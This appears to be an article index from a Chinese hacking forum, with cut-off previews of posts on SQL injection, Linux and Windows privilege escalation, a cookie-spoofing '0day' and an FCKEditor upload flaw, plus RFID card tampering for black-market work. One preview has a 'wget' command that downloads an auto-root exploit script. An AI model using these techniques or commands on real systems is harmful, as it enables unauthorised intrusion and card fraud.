文章列表
RFID开发之圣诞老人无稽之谈
RFID开发之圣诞老人无稽之谈0X01圣诞节的由来因为个人爱好对智能卡有一点点皮毛的学习。年初的时候有个做智能卡黑产的朋友找到我,说他接了一个学校的单子,让我帮他写个可以Modify Data的程序(他手上的软件只可以复制卡),年初的时候需要做毕业设计,没空没帮他看。过了几个月,他把读卡器(0FC3读
AspCms_v1.5_20110517 SQL注射
好久没上土司了,上来一看发现在删号名单内.....也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。
我也上一个Perl 自动提权脚本吧
#!/bin/perl# Auto Rooting Linux# By FenniC# Local root 2007 2008 2009 for Linux # Usage: perl autor00t.pl# Version: 1.0 !!! By FenniC# If you have any more local root exploits add them and send the update version to [email protected]# Users can be paid.# Or send the exploit and i
《暗黑》第一章:蜕变 || 第二节:思维窥探
第一章 蜕变2. 思维窥探主页打开完成后,并没有出现熟悉的网站画面,而是直接弹出一个信息框:“黑客你好,虽然我不知道你是谁,但是我知道你的目的,请离开!”随即浏览器就自动关闭了。“咦,这是怎么回事,这尼玛还能自动识别我是不是黑客?”方煜想到,以方煜的理解范畴,除非自己有明显的攻击动作
linux 自动提权perl脚本
经常看到有人求linux各种版本的 exp 共享下国外发现的一个自动化脚本 (貌似 linux版块木有权限 就发这里得了) 地址 http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt 使用demoyaseng@UAUC:~$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt -O
虚拟主机提权
是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"?原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。下面是个人
CMSDJPHP 七禧舞曲管理系统cookies欺骗漏洞 0day
应该是通杀所有PHP版本 。最新版本没有测试。从补丁来看,漏洞依然存在。这是一个神级漏洞,体现了程序员的神逻辑。看代码admin/admin_check.php<?php$CD_Version='V1.0';$CD_Build='20100501';function admincheck($CD_Permission){if($_COOKIE<>''){$menuarr=explode(',',$_COOKIE);$adminlogined='F
暴风影音(baofeng.com)分站 SQL注入漏洞
暴风影音(baofeng.com)分站 SQL注入漏洞
海康威视DDNS系统 代码执行漏洞+用户验证漏洞
海康威视DDNS系统 代码执行漏洞+用户验证漏洞
FCKEditor ASP Version 2.6.8任意文件上传漏洞分析
一. 漏洞概要漏洞描述: FCKeditor是一款开放源码的HTML文本编辑器。FCKEditor 2.6.8及其他版本在'FileUpload()'函数的实现上存在安全漏洞,攻击者可利用此漏洞上传任意文件到受影响计算机。受影响版本:FCKEditor 2.6.8二. 原理分析总共存在两处漏洞,第一处在对上传文件扩展名的正则表达式匹配上,
